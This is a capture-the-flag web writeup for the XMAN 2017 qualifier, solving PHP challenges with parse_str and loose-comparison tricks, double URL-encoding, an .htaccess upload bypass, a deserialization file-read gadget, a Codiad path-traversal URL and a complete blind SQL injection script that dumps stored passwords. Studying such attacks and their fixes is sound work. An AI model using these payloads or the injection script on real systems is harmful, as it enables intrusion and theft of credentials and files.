XMAN 2017 Qualifier: Web Writeup

All of the challenges were basic ones.

variacover

```php
<meta charset="utf-8">
<?php
error_reporting(0);
if (empty($_GET['b'])) {
    show_source(__FILE__);
    die();
}else{
    include('flag.php');
    $a = "www.XMAN.com";
    $b = $_GET['b'];
    @parse_str($b);   // no second argument: every key of the query string becomes a local variable
    if ($a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')) {
        echo $flag;
    }else{
        exit('你的答案不对0.0');   // "your answer is wrong"
    }
}
?>
```

Two things combine here: a parse_str() variable overwrite and PHP's loose comparison. Called with a single argument, parse_str() registers each key of the query string as a variable in the current scope (that one-argument form was deprecated in PHP 7.2 and removed in PHP 8.0), so b=a[0]=240610708 replaces $a with an array whose element 0 is the string "240610708". md5("240610708") is 0e462097431906509019562988736854 and md5("QNKCDZO") is 0e830400451993494058024219903391; both look like numeric strings in scientific notation, so == converts both to float 0 and they compare equal, while the != against the literal 'QNKCDZO' still holds. A === (or hash_equals()) would have stopped this.

http://challenges.xctf.org.cn:7771/?b=a[0]=240610708

Flag:

XMAN{A_sTr_covcderd_t3st_you_oW?}

urldecode

Submitting me=XMAN only returns the hint "urldecode":

The point is double decoding: the web server URL-decodes the parameter once, and the application then calls urldecode() on it again. URL-encode XMAN, then replace each % with %25; the first decode turns %25 back into %, and the second decode yields XMAN, so the literal-string check never sees "XMAN" but the decoded value matches. Final payload:

http://challenges.xctf.org.cn:7772/?me=%2558%254d%2541%254e

Flag:

XMAN{UrlDeCode_CooL_yOu_u0D3rSta9D!
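The two-stage decode that makes the payload above work, as an added example (not code from the challenge or the author). The handler is a hypothetical reconstruction of the challenge's logic, since the page only shows the "urldecode" hint; the encoder is the general rule, not just the XMAN case.

```python
"""Double URL-encoding and the two-stage decode that makes it work: the web
server decodes the query string once, the application calls urldecode() on
the result again. Added example; challenge_like_handler() is a guess at the
challenge's logic, not its real source."""
from urllib.parse import parse_qs, unquote


def double_url_encode(text):
    """Percent-encode every byte, then encode the '%' itself as %25."""
    return "".join("%%25%02x" % b for b in text.encode("utf-8"))


def challenge_like_handler(raw_query):
    """Hypothetical reconstruction: the literal value XMAN is refused with a
    hint, but a value whose urldecode() equals XMAN gets the flag."""
    me = parse_qs(raw_query).get("me", [""])[0]   # first decode: done by the web server
    if me == "XMAN":
        return "hint: urldecode"
    if unquote(me) == "XMAN":                      # second decode: the app's urldecode()
        return "flag"
    return "nope"


if __name__ == "__main__":
    payload = double_url_encode("XMAN")
    print(payload)                                  # %2558%254d%2541%254e
    print(challenge_like_handler("me=" + payload))  # flag
```

The same trick applies to any filter that inspects the once-decoded parameter and then decodes again before use; the fix is to decode exactly once, at the edge, and validate the value the code actually uses.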

upload

I didn't do this one during the contest.

The approach is .htaccess. First create a file named .htaccess with the following content:

```apache
<FilesMatch "_chybeta.gif">
SetHandler application/x-httpd-php
</FilesMatch>
```

With mod_php loaded and AllowOverride permitting .htaccess in the upload directory, this makes Apache run any uploaded file whose name matches _chybeta.gif through the PHP handler, so a PHP shell can then be uploaded under a .gif name.

But when I went to upload it, the site told me the file already exists. Oh well, GG. Nobody maintained the challenge after the contest ended.

unserialize

Visit:

http://challenges.xctf.org.cn:7774/?code=1

which gives the hint "flag.php". Visit:

http://challenges.xctf.org.cn:7774/flag.php

which gives hint 2, "help.php":

http://challenges.xctf.org.cn:7774/help.php

which gives hint 3:

```php
class FileClass{ public $filename = 'error.log'; public function __toString(){ return file_get_contents($this->filename); } }
```

So this is a deserialization problem: the page unserializes what we send and then echoes it, and echoing an object calls its __toString(), which here returns file_get_contents() of a filename we control. Generate the payload with:

```php
<?php
class FileClass{
    public $filename = 'error.log';
    public function __toString(){
        return file_get_contents($this->filename);
    }
}
$chybeta = new FileClass();
$chybeta->filename = 'flag.php';
echo serialize($chybeta);
```

Visit:

http://challenges.xctf.org.cn:7774/?code=O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";}

Final flag:

XMAN{UUNser1AL1Z3_XMAN__0)(0}

Source of this challenge (index.php):

```php
<?php
if(empty($_GET['code'])){
    exit('?code=');
}
class FileClass{
    public $filename = 'error.log';
    public function __toString(){
        return file_get_contents($this->filename);
    }
}
class User{
    public $age = 0;
    public $name = '';
    public function __toString()
    {
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}
echo "hint: flag.php";
$obj = unserialize($_GET['code']);   // user-controlled data reaches unserialize()
echo $obj;                            // echo calls __toString() on whatever class was instantiated
?>
```
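The same payload built without a PHP interpreter, as an added example (not the challenge's or the author's code): a minimal implementation of PHP's serialize() format for scalars, arrays and objects with public properties, plus the FileClass gadget from the source above. The class and property names are the challenge's; the PhpObject helper and everything else are mine.

```python
"""Build the PHP serialize() representation of scalars, arrays and objects
with public properties, so a gadget payload can be generated without PHP.
Added example; PhpObject is a helper of this example, not a PHP API."""


class PhpObject:
    """An object to serialize: class name plus public properties, in order."""
    def __init__(self, class_name, **props):
        self.class_name = class_name
        self.props = props


def _s(text):
    # s:<len>:"<bytes>"; PHP counts bytes, not characters.
    return 's:%d:"%s";' % (len(text.encode("utf-8")), text)


def php_serialize(value):
    """Serialize None/bool/int/float/str/list/dict/PhpObject the way PHP does."""
    if value is None:
        return "N;"
    if isinstance(value, bool):            # must precede int: bool is an int subclass
        return "b:%d;" % int(value)
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, float):
        return "d:%s;" % repr(value)
    if isinstance(value, str):
        return _s(value)
    if isinstance(value, list):            # PHP array with keys 0..n-1
        body = "".join("i:%d;%s" % (i, php_serialize(v)) for i, v in enumerate(value))
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, dict):            # PHP associative array
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    if isinstance(value, PhpObject):
        body = "".join(_s(k) + php_serialize(v) for k, v in value.props.items())
        return 'O:%d:"%s":%d:{%s}' % (len(value.class_name.encode("utf-8")),
                                        value.class_name, len(value.props), body)
    raise TypeError("unsupported type: %r" % type(value))


def file_read_gadget(path):
    """FileClass from the challenge: echo $obj calls __toString(), which
    returns file_get_contents($this->filename)."""
    return php_serialize(PhpObject("FileClass", filename=path))


if __name__ == "__main__":
    print(file_read_gadget("flag.php"))
    # O:9:"FileClass":1:{s:8:"filename";s:8:"flag.php";}
```

Because echo $obj runs __toString() on whichever class unserialize() instantiated, any loaded class with a useful __toString(), __wakeup() or __destruct() is a gadget. unserialize($data, ['allowed_classes' => false]) (PHP 7.0+) turns objects into __PHP_Incomplete_Class so no gadget method runs; the real fix is to never unserialize user input and to exchange JSON instead.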

PHP

Directory scanning turned up index.php~ (an editor backup copy of index.php), with the following source:

```php
<?php
$a=0;
$b=0;
$c=0;
if (isset($_GET['aaa']))
{
    $aaa = $_GET['aaa'];
    $aaa=="1"?die("Emmm..."):NULL;      // loose ==, but string against string
    switch ($aaa)                       // switch also compares with ==, here against integers
    {
        case 0:
        case 1:
            $a=1;
            break;
    }
}
$bbb=(array)json_decode(@$_GET['bbb']);
if(is_array($bbb)){
    is_numeric(@$bbb["ccc"])?die("Emmm..."):NULL;
    if(@$bbb["ccc"]){
        ($bbb["ccc"]>2017)?$b=1:NULL;   // string > int: the numeric prefix is used
    }
    if(is_array(@$bbb["ddd"])){
        if(count($bbb["ddd"])!==2 OR !is_array($bbb["ddd"][0])) die("Emmm...");
        $eee = array_search("XMAN", $bbb["ddd"]);   // loose comparison
        $eee===false?die("Emmm..."):NULL;
        foreach($bbb["ddd"] as $key=>$val){
            $val==="XMAN"?die("Emmm..."):NULL;     // strict comparison
        }
        $c=1;
    }
}
if($a && $b && $c){
    include "flag.php";
    echo $flag;
}
?>
```

This tests PHP loose typing (the rules below are PHP 5/7; PHP 8 compares a non-numeric string with a number as strings, so the same payload fails there). Three gates:

  • aaa: "1abcdef" == "1" is false because both operands are strings and "1abcdef" is not numeric, so it is a plain string comparison; but switch compares with == against the integer case labels, and "1abcdef" == 1 is true because the string is converted to its leading number. So $a = 1.
  • ccc: "2018a" is not is_numeric(), yet "2018a" > 2017 is true for the same leading-number reason. So $b = 1.
  • ddd: [[1],0] has two elements with an array first; array_search() compares loosely and "XMAN" == 0 is true (a non-numeric string converts to 0), so it does not return false; the foreach uses === and never matches. So $c = 1.

Payload:

http://challenges.xctf.org.cn:8004/index.php?aaa=1abcdef&bbb={"ccc":"2018a","ddd":[[1],0]}

Flag:

XMAN{PHP_IS_THE_BEST_LANGUAGE}
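The PHP 7 comparison rules behind both the variacover md5 trick and this challenge, emulated in Python as an added example (not code from the challenges or the author). The emulation covers the type pairs these two checks use, string/string, string/number and array/scalar, and then replays both gates; the md5 values are the real ones, everything else is constructed here.

```python
"""PHP 7 loose comparison (==, >) emulated in Python, applied to the two checks
in this writeup: the md5 "0e" trick in variacover and the aaa/ccc/ddd gates of
the PHP challenge. Added example; it models the PHP 5/7 rules the payloads
relied on. In PHP 8 "XMAN" == 0 and "1abcdef" == 1 are false."""
import hashlib
import re

# PHP numeric string: optional leading whitespace and sign, digits with an
# optional fraction and exponent. "0e830..." matches and evaluates to 0.0.
_NUMERIC = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$')
# Leading-numeric prefix, the part PHP 7 keeps when converting "2018a" or "1abcdef".
_LEADING = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?')


def is_numeric(v):
    """PHP is_numeric(): ints/floats and fully numeric strings only."""
    if isinstance(v, bool):
        return False
    if isinstance(v, (int, float)):
        return True
    return isinstance(v, str) and _NUMERIC.match(v) is not None


def to_number(s):
    """PHP 7 string-to-number conversion: the numeric prefix if any, else 0."""
    m = _LEADING.match(s)
    return float(m.group(0)) if m else 0.0


def loose_eq(x, y):
    """PHP 7 == for str/str, str/number, number/number and arrays."""
    if isinstance(x, list) or isinstance(y, list):
        # An array never equals a scalar; two arrays match element-wise.
        return (isinstance(x, list) and isinstance(y, list) and len(x) == len(y)
                and all(loose_eq(a, b) for a, b in zip(x, y)))
    if isinstance(x, str) and isinstance(y, str):
        if is_numeric(x) and is_numeric(y):   # "0e123" == "0e456": both become 0.0
            return to_number(x) == to_number(y)
        return x == y                         # otherwise a byte-wise compare
    if isinstance(x, str):
        return to_number(x) == y              # "1abcdef" == 1 and "XMAN" == 0 hold
    if isinstance(y, str):
        return x == to_number(y)
    return x == y


def loose_gt(x, y):
    """PHP 7 >: strings take their numeric prefix; an array beats any scalar."""
    if isinstance(x, list) != isinstance(y, list):
        return isinstance(x, list)
    if isinstance(x, str):
        x = to_number(x)
    if isinstance(y, str):
        y = to_number(y)
    return x > y


def php_truthy(v):
    return v not in (None, False, 0, "", "0", [])


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def variacover_check(a0):
    """The variacover gate, with $a[0] already overwritten via parse_str()."""
    return (not loose_eq(a0, "QNKCDZO")
            and loose_eq(md5_hex(a0), md5_hex("QNKCDZO")))


def php_challenge_check(aaa, bbb):
    """The $a/$b/$c gates of the PHP challenge; bbb is the json-decoded value."""
    a = b = c = 0
    if aaa is not None:
        if loose_eq(aaa, "1"):                     # string vs string: "1abcdef" == "1" is false
            return False
        if loose_eq(aaa, 0) or loose_eq(aaa, 1):   # switch/case compares with ==
            a = 1
    if isinstance(bbb, dict):
        ccc = bbb.get("ccc")
        if ccc is not None:
            if is_numeric(ccc):                    # "2018a" passes; 2018 or "2018" dies
                return False
            if php_truthy(ccc) and loose_gt(ccc, 2017):
                b = 1
        ddd = bbb.get("ddd")
        if isinstance(ddd, list):
            if len(ddd) != 2 or not isinstance(ddd[0], list):
                return False
            if not any(loose_eq("XMAN", v) for v in ddd):             # array_search() is loose
                return False
            if any(isinstance(v, str) and v == "XMAN" for v in ddd):  # foreach uses ===
                return False
            c = 1
    return bool(a and b and c)


if __name__ == "__main__":
    print(variacover_check("240610708"))                                       # True
    print(php_challenge_check("1abcdef", {"ccc": "2018a", "ddd": [[1], 0]}))  # True
```

The lesson in code form: every one of these gates is a comparison whose result depends on the operand types, so use === (and hash_equals() for hashes), and validate the type before comparing.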

downloaded

After logging in as admin, the application turned out to be Codiad 2.5.3, and there is a PoC on exploit-db:

https://www.exploit-db.com/exploits/36371/

It took a little while to find where the flag was. Final payload (a path traversal through the file manager's download.php):

http://challenges.xctf.org.cn:7775/components/filemanager/download.php?path=../../../../../../../../../../../var/www/flag.txt&type=undefined

XMAN{D0WnL0D_3v3RYTh1ng_You_Win}
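The traversal above next to the check a download handler needs, as an added example (not Codiad's code and not the author's): the file layout is a constructed stand-in for the challenge's /var/www, and the two resolve functions are mine.

```python
"""Path traversal in a download handler: the vulnerable join beside a hardened
resolve. Added example; the directory layout built in demo() is constructed."""
import os
import tempfile


def vulnerable_resolve(base, user_path):
    """Joins the user-supplied path onto the base directory with no check;
    a ../ chain walks out of base, which is what the payload above does."""
    return os.path.join(base, user_path)


def hardened_resolve(base, user_path):
    """Canonicalize (symlinks and '..') first, then require the result to
    stay inside base; refuse anything else instead of serving it."""
    base_real = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base_real, user_path))
    if os.path.commonpath([base_real, target]) != base_real:
        raise PermissionError("path escapes base directory: %r" % user_path)
    return target


def demo():
    """Constructed layout: <root>/workspace/notes.txt is served, <root>/flag.txt
    is outside the served directory. Returns (leaked, blocked, allowed)."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "workspace")
    os.mkdir(base)
    with open(os.path.join(base, "notes.txt"), "w") as f:
        f.write("ok\n")
    with open(os.path.join(root, "flag.txt"), "w") as f:
        f.write("XMAN{constructed}\n")

    traversal = "../flag.txt"
    with open(vulnerable_resolve(base, traversal)) as f:
        leaked = f.read().strip()
    try:
        hardened_resolve(base, traversal)
        blocked = False
    except PermissionError:
        blocked = True
    with open(hardened_resolve(base, "notes.txt")) as f:
        allowed = f.read().strip()
    return leaked, blocked, allowed


if __name__ == "__main__":
    print(demo())   # ('XMAN{constructed}', True, 'ok')
```

Canonicalize before comparing, and compare path components rather than string prefixes; stripping "../" from the input is not a fix, because encoded or doubled variants get past it.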

spring

CVE-2017-4971, a Spring Web Flow vulnerability (expression-language injection through the data binding of view-state form submissions). I hunted around for a PoC.

XMAN{UGhoiXoeDae6zeethaxoh1eex3xeiJ7y}

Reference: https://github.com/Medicean/VulApps/tree/master/s/springwebflow/1

CTF用户登录 (CTF User Login)

The login form is injectable. The success/failure message is emitted before the HTML tags, so it is not visible in the rendered page in a browser; look at the raw response instead. Fuzzing showed that commas and spaces are filtered, while union select, substr, and, or, single quotes and # are not.

  • Commas are filtered; the FROM ... FOR form works instead:

    mid(user() from 1 for 1)
    substr(user() from 1 for 1)

  • Spaces are filtered; a tab works instead, URL-encoded as %09.

So this is a boolean-based blind injection. The Python script:

```python
# -*- coding: utf-8 -*-
# Boolean-based blind injection against the login form. Commas and spaces are
# filtered, so substr(x from i for 1) replaces substr(x, i, 1) and %09 (tab)
# replaces every space. Each character is recovered by binary search on ascii().
import sys
import requests

URL = "http://challenges.xctf.org.cn:8003/login.php"
PROXY = {"http": "http://127.0.0.1:8080"}   # Burp; set to None to send directly
ERROR_MARK = "错误"                           # "error": printed when the login fails

# Hex literals avoid quotes and commas: 0x3c62723e = "<br>", 0x786d616e = "xman",
# 0x6374665f7573657273 = "ctf_users".
TARGETS = [
    ("database", "database()"),
    ("tables", "(SELECT%09GROUP_CONCAT(table_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.TABLES%09WHERE%09TABLE_SCHEMA=0x786d616e)"),
    ("columns", "(SELECT%09GROUP_CONCAT(column_name%09SEPARATOR%090x3c62723e)%09FROM%09INFORMATION_SCHEMA.COLUMNS%09WHERE%09TABLE_NAME=0x6374665f7573657273)"),
    ("data", "(SELECT%09GROUP_CONCAT(gpass%09SEPARATOR%090x3c62723e)%09FROM%09ctf_users)"),
]


def send_payload(payload):
    # The body is passed pre-encoded so %09 reaches the server as a tab.
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    body = "username=" + payload + "&password=bb&submit="
    return requests.post(URL, data=body, headers=headers, proxies=PROXY).text


def condition_true(expr, i, value):
    # a' or (select ascii(substr(expr from i for 1)) <= value)#
    payload = ("a'%09or%09(%09select%09ascii(substr(" + expr + "%09from%09"
               + str(i) + "%09for%091))<=" + str(value) + ")%23")
    return ERROR_MARK not in send_payload(payload)   # no error: the OR branch was true


def find_char(expr, i):
    # Binary search over the half-open interval (low, high]; ascii() of a
    # substr past the end of the string is 0, which marks the end.
    low, high = -1, 255
    while high - low > 1:
        mid = (low + high) // 2
        if condition_true(expr, i, mid):
            high = mid
        else:
            low = mid
    return high


def dump(expr):
    # Extract expr character by character, printing as it goes.
    result = ""
    i = 1
    while True:
        c = find_char(expr, i)
        if c == 0:
            break
        result += chr(c)
        sys.stdout.write(chr(c))
        sys.stdout.flush()
        i += 1
    sys.stdout.write("\r\n")
    return result


if __name__ == "__main__":
    for name, expr in TARGETS:
        print("The %s:" % name)
        dump(expr)
```

Final flag:

XMAN{DO_you_l1ke_sqlmap_sqlmap}

倾听世界的声音 (Listen to the Voice of the World)

XSS. I haven't looked into it yet. Respect to the masters who solved it.

Reference: http://www.cnblogs.com/zaki-Gui/p/7115821.html


Author: chybeta

Published: 2017-07-16 11:07

Last updated: 2017-07-28 15:07

Original link: http://chybeta.github.io/2017/07/16/XMAN选拔赛-2017-web-writeup/

License: CC BY-NC-ND 4.0 International. Keep the original link and author when reposting.